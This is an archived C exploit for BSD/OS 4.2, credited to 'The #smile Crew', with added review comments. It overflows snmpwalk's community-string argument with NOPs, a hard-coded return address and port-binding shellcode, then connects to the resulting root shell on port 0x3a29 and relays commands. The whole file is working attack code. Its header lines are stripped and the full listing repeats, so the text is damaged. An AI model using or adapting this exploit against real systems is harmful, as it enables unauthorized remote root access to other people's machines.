/*
 * 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit
 *
 * By: Safety and dekadish (Feb 2002)
 *
 * The #smile Crew
 *
 * Version: 0.1
 */

/*
 * NOTE(review): this is an archived 2002 listing reformatted from a
 * collapsed, single-line copy.  Two things were damaged by extraction
 * and are left as found:
 *   - the 14 #include directives below lost their header names;
 *   - the whole file appears a second time after connect2shell()
 *     (see the note at that point).
 * Program flow: main() builds a global buffer via fippla(), forks and
 * runs SNMPWALK with that buffer as the argument after "-c", waits for
 * it, then connect2shell() connects to argv[1] on TCP port 0x3a29 and
 * relays stdin/stdout over the socket.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might want to change it */
#define RETADDR 0x8045834   /* hard-coded value that fippla() stamps, little-endian, over the start of buffer; specific to the target named in the header, nothing here derives it */
#define BUFLEN 260          /* size of the malloc()ed buffer built by fippla() */
#define NOP 0x90            /* filler byte written over buffer[0..255] before the other writes */

/* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */
/*
 * Byte string that fippla() copies into the tail of buffer.  The per-line
 * assembly comments are the original author's.  strlen() is used as its
 * length further down, so the string must contain no 0x00 byte (none of
 * the escapes below is \x00).
 */
char shellkod[] =
    "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
    "\xf7\xd0"             // not eax
    "\x50"                 // push eax
    "\x31\xc0"             // xor eax, eax
    "\xb0\x9a"             // mov al, 09ah
    "\x50"                 // push eax
    "\x89\xe7"             // mov edi, esp
    "\x31\xdb"             // xor ebx, ebx
    "\xf7\xe3"             // mul ebx
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\xb0\x61"             // mov al, 97
    "\xff\xd7"             // call edi
    "\x89\xc6"             // mov esi, eax
    "\x52"                 // push edx
    "\x66\x68\x3a\x29"     // push word 4135
    "\x66\x53"             // push bx
    "\x89\xe5"             // mov ebp, esp
    "\x6a\x10"             // push byte 16
    "\x55"                 // push ebp
    "\x56"                 // push esi
    "\xb0\x68"             // mov al, 104
    "\xff\xd7"             // call edi
    "\xb0\x6a"             // mov al, 106
    "\xff\xd7"             // call edi
    "\x52"                 // push edx
    "\x52"                 // push edx
    "\x56"                 // push esi
    "\xb0\x1e"             // mov al, 30
    "\xff\xd7"             // call edi
    "\x53"                 // push ebx
    "\x50"                 // push eax
    "\xb0\x5a"             // mov al, 90
    "\xff\xd7"             // call edi
    "\x4b"                 // dec ebx
    "\x79\xf7"             // jns duploop
    "\x50"                 // push eax
    "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
    "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
    "\x89\xe3"             // mov ebx, esp
    "\x50"                 // push eax
    "\x54"                 // push esp
    "\x53"                 // push ebx
    "\xb0\x3b"             // mov al, 59
    "\xff\xd7";

/* Global, heap-allocated by fippla(), consumed by main() as the "-c" argument, freed in main(). */
char *buffer;

char fippla(u_long ret);
int connect2shell(char *ip);

/*
 * Entry point.  argv[1] is used both as the snmpwalk target and as the
 * address connect2shell() later connects to.
 *
 * Review notes (left as found):
 *  - the usage message has nothing after "%s"; the placeholder was
 *    presumably lost in extraction;
 *  - the execl() argument list is terminated with the int 0 rather than
 *    (char *)NULL, which is not a valid sentinel where int and pointer
 *    sizes differ;
 *  - if execl() succeeds the child never returns here, and the parent
 *    ignores the status written to ret by waitpid();
 *  - "return;" in an int function returns no value to the caller.
 */
int main(int argc, char *argv[])
{
    int ret;
    pid_t pid;

    fprintf(stderr, "%s\n", "[The #smile Crew]");

    if (argc != 2) {
        fprintf(stderr, "Usage: %s \n\n", argv[0]);
        exit(-1);
    }

    fippla(RETADDR);   /* fills the global buffer; its return value (always 1) is ignored */

    pid = fork();
    if (pid == -1) {
        fprintf(stderr, "fork() failed\n");
        exit(-1);
    }
    if (!pid) {
        /* child: buffer is passed as the argument following "-c" */
        if (execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1) {
            fprintf(stderr, "Unable to run snmpwalk (correct path?)\n");
            exit(-1);
        }
    } else
        waitpid(pid, &ret, 0);   /* parent: block until snmpwalk exits */

    connect2shell(argv[1]);   /* only returns via exit() inside it */
    free(buffer);
    return;
}

/*
 * Build the global buffer (BUFLEN bytes, malloc() result unchecked):
 *   1. buffer[0..255]   <- NOP
 *   2. shellkod          -> copied to end at offset 255
 *                           (start = BUFLEN - strlen(shellkod) - 5)
 *   3. buffer[0..115]   <- ret, repeated as 4 little-endian bytes
 *                           (the loop tests i < 115 but each pass writes
 *                           4 bytes, so the last pass starts at 112 and
 *                           ends at 115: 116 bytes total)
 * Offsets 256..259 are never written, and no terminating NUL is placed
 * anywhere in the allocation; main() then hands buffer to execl() as a C
 * string, so where that string ends depends on heap contents past the
 * allocation (out-of-bounds read).
 *
 * ret: value to stamp over the head of the buffer.
 * Returns 1 unconditionally.
 */
char fippla(u_long ret)
{
    int i;

    buffer = (char *)malloc(BUFLEN);
    for (i = 0; i < 256 ; i++)
        *(buffer+i) = NOP;
    memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod));
    for (i = 0; i < 115;) {
        buffer[i++] = (ret & 0xff);
        buffer[i++] = (ret >> 8) & 0xff;
        buffer[i++] = (ret >> 16) & 0xff;
        buffer[i++] = (ret >> 24) & 0xff;
    }
    return(1);
}

/*
 * Connect to ip on TCP port 0x3a29, send one command line, then relay
 * bytes between stdin/stdout and the socket until either side closes.
 * Never returns normally: every exit path is exit().
 *
 * ip: dotted-quad string passed straight to inet_addr(); its failure
 *     value is not checked.
 *
 * Review notes (left as found):
 *  - socket() result is not checked before connect();
 *  - only three fields of sock are set; the rest of the struct is
 *    uninitialized stack (on BSD that presumably includes sin_len);
 *  - fds is never cleared with FD_ZERO(), so uninitialized bits for other
 *    descriptors <= s reach select(), whose return value is also unchecked;
 *  - read(0, ...) returning 0 (EOF on stdin) is reported as an error;
 *  - write() return values are ignored, so short writes drop data;
 *  - free(buf) and "return;" after the while (1) are unreachable.
 */
int connect2shell(char *ip)
{
    char *buf;
    fd_set fds;
    int s, n, ret;
    struct sockaddr_in sock;

    sock.sin_family = AF_INET;
    sock.sin_port = htons(0x3a29);
    sock.sin_addr.s_addr = inet_addr(ip);

    s = socket(AF_INET, SOCK_STREAM, 0);
    ret = connect(s, (struct sockaddr *)&sock, sizeof(sock));
    if (ret) {
        printf("Exploit failed\n");
        exit(0);
    } else
        printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n");

    dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n");

    buf = (char *)malloc(512);   /* unchecked; reads below use at most 511 bytes of it */
    memset(buf, 0, 512);

    while (1) {
        FD_SET(0, &fds);
        FD_SET(s, &fds);
        select((s+1), &fds, 0, 0, 0);
        if (FD_ISSET(0, &fds)) {
            /* stdin -> socket */
            n = read(0, buf, 511);
            if (n < 1) {
                fprintf(stderr, "read() error\n");
                exit(-1);
            }
            write(s, buf, n);
        }
        if (FD_ISSET(s, &fds)) {
            /* socket -> stdout; 0 bytes means the peer closed */
            n = read(s, buf, 511);
            if (n < 0) {
                fprintf(stderr, "read() error\n");
                exit(-1);
            } else if (!n) {
                printf("Disconnected\n");
                exit(0);
            }
            write(1, buf, n);
        }
    }
    free(buf);
    return;
}

/*
 * NOTE(review): everything from here to the end of the file is a verbatim
 * second copy of the listing above (an extraction artifact).  As a single
 * translation unit it redefines shellkod, buffer, main, fippla and
 * connect2shell, so this file cannot compile as-is; the reviewed copy with
 * comments is the one above.
 */

/*
 * 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit
 *
 * By: Safety and dekadish (Feb 2002)
 *
 * The #smile Crew
 *
 * Version: 0.1
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might want to change it */
#define RETADDR 0x8045834
#define BUFLEN 260
#define NOP 0x90

/* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */
char shellkod[] =
    "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
    "\xf7\xd0"             // not eax
    "\x50"                 // push eax
    "\x31\xc0"             // xor eax, eax
    "\xb0\x9a"             // mov al, 09ah
    "\x50"                 // push eax
    "\x89\xe7"             // mov edi, esp
    "\x31\xdb"             // xor ebx, ebx
    "\xf7\xe3"             // mul ebx
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\xb0\x61"             // mov al, 97
    "\xff\xd7"             // call edi
    "\x89\xc6"             // mov esi, eax
    "\x52"                 // push edx
    "\x66\x68\x3a\x29"     // push word 4135
    "\x66\x53"             // push bx
    "\x89\xe5"             // mov ebp, esp
    "\x6a\x10"             // push byte 16
    "\x55"                 // push ebp
    "\x56"                 // push esi
    "\xb0\x68"             // mov al, 104
    "\xff\xd7"             // call edi
    "\xb0\x6a"             // mov al, 106
    "\xff\xd7"             // call edi
    "\x52"                 // push edx
    "\x52"                 // push edx
    "\x56"                 // push esi
    "\xb0\x1e"             // mov al, 30
    "\xff\xd7"             // call edi
    "\x53"                 // push ebx
    "\x50"                 // push eax
    "\xb0\x5a"             // mov al, 90
    "\xff\xd7"             // call edi
    "\x4b"                 // dec ebx
    "\x79\xf7"             // jns duploop
    "\x50"                 // push eax
    "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
    "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
    "\x89\xe3"             // mov ebx, esp
    "\x50"                 // push eax
    "\x54"                 // push esp
    "\x53"                 // push ebx
    "\xb0\x3b"             // mov al, 59
    "\xff\xd7";

char *buffer;

char fippla(u_long ret);
int connect2shell(char *ip);

int main(int argc, char *argv[])
{
    int ret;
    pid_t pid;

    fprintf(stderr, "%s\n", "[The #smile Crew]");

    if (argc != 2) {
        fprintf(stderr, "Usage: %s \n\n", argv[0]);
        exit(-1);
    }

    fippla(RETADDR);

    pid = fork();
    if (pid == -1) {
        fprintf(stderr, "fork() failed\n");
        exit(-1);
    }
    if (!pid) {
        if (execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1) {
            fprintf(stderr, "Unable to run snmpwalk (correct path?)\n");
            exit(-1);
        }
    } else
        waitpid(pid, &ret, 0);

    connect2shell(argv[1]);
    free(buffer);
    return;
}

char fippla(u_long ret)
{
    int i;

    buffer = (char *)malloc(BUFLEN);
    for (i = 0; i < 256 ; i++)
        *(buffer+i) = NOP;
    memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod));
    for (i = 0; i < 115;) {
        buffer[i++] = (ret & 0xff);
        buffer[i++] = (ret >> 8) & 0xff;
        buffer[i++] = (ret >> 16) & 0xff;
        buffer[i++] = (ret >> 24) & 0xff;
    }
    return(1);
}

int connect2shell(char *ip)
{
    char *buf;
    fd_set fds;
    int s, n, ret;
    struct sockaddr_in sock;

    sock.sin_family = AF_INET;
    sock.sin_port = htons(0x3a29);
    sock.sin_addr.s_addr = inet_addr(ip);

    s = socket(AF_INET, SOCK_STREAM, 0);
    ret = connect(s, (struct sockaddr *)&sock, sizeof(sock));
    if (ret) {
        printf("Exploit failed\n");
        exit(0);
    } else
        printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n");

    dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n");

    buf = (char *)malloc(512);
    memset(buf, 0, 512);

    while (1) {
        FD_SET(0, &fds);
        FD_SET(s, &fds);
        select((s+1), &fds, 0, 0, 0);
        if (FD_ISSET(0, &fds)) {
            n = read(0, buf, 511);
            if (n < 1) {
                fprintf(stderr, "read() error\n");
                exit(-1);
            }
            write(s, buf, n);
        }
        if (FD_ISSET(s, &fds)) {
            n = read(s, buf, 511);
            if (n < 0) {
                fprintf(stderr, "read() error\n");
                exit(-1);
            } else if (!n) {
                printf("Disconnected\n");
                exit(0);
            }
            write(1, buf, n);
        }
    }
    free(buf);
    return;
}